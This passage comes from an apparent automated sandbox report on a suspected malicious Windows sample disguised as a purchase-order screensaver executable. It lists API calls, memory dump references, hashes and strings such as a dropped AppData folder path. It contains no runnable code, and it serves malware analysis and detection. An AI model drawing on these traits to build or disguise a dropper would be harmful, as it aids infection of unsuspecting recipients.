                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                      • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                      • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                      APIs
                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString
                                                                                                      • String ID:
                                                                                                      • API String ID: 1096422788-0
                                                                                                      • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                      • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                                                                      • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                      • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                                      • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                                                                      • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                                      • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 973152223-0
                                                                                                      • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                      • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                      • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                      • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                                                      • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                                                                      • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                                                      • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                                      • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                                                                      • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                                      • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404C64
                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                                                                      • ShowWindow.USER32(00000000), ref: 0040514F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                      • String ID: $M$N
                                                                                                      • API String ID: 1638840714-813528018
                                                                                                      • Opcode ID: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                                                                      • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                                                                      • Opcode Fuzzy Hash: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                                                                      • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                                                                      • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                                                        • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                                                                        • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                      • String ID: A$C:\Users\user\AppData\Local\googly\pulsation$Call$&B
                                                                                                      • API String ID: 2246997448-1352790449
                                                                                                      • Opcode ID: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                                                                                      • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                                                                      • Opcode Fuzzy Hash: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                                                                                      • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\googly\pulsation, xrefs: 004020FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstance
                                                                                                      • String ID: C:\Users\user\AppData\Local\googly\pulsation
                                                                                                      • API String ID: 542301482-4003725227
                                                                                                      • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                                                                      • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                                                                                      • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                                                                      • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID:
                                                                                                      • API String ID: 1974802433-0
                                                                                                      • Opcode ID: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                                                                      • Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
                                                                                                      • Opcode Fuzzy Hash: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                                                                      • Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A
                                                                                                      APIs
                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                                                                      • GetSysColor.USER32(?), ref: 00404417
                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404438
                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                                                                      • SendMessageW.USER32(00000000), ref: 004044BA
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                                                                      • SetCursor.USER32(00000000), ref: 00404539
                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                                                                      • SetCursor.USER32(00000000), ref: 0040455D
                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                      • String ID: Call$N$open
                                                                                                      • API String ID: 3615053054-2563687911
                                                                                                      • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                      • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                                                                      • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                      • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                                                                      APIs
                                                                                                      • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                                                                      • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                                                                      • wsprintfA.USER32 ref: 00405CDE
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
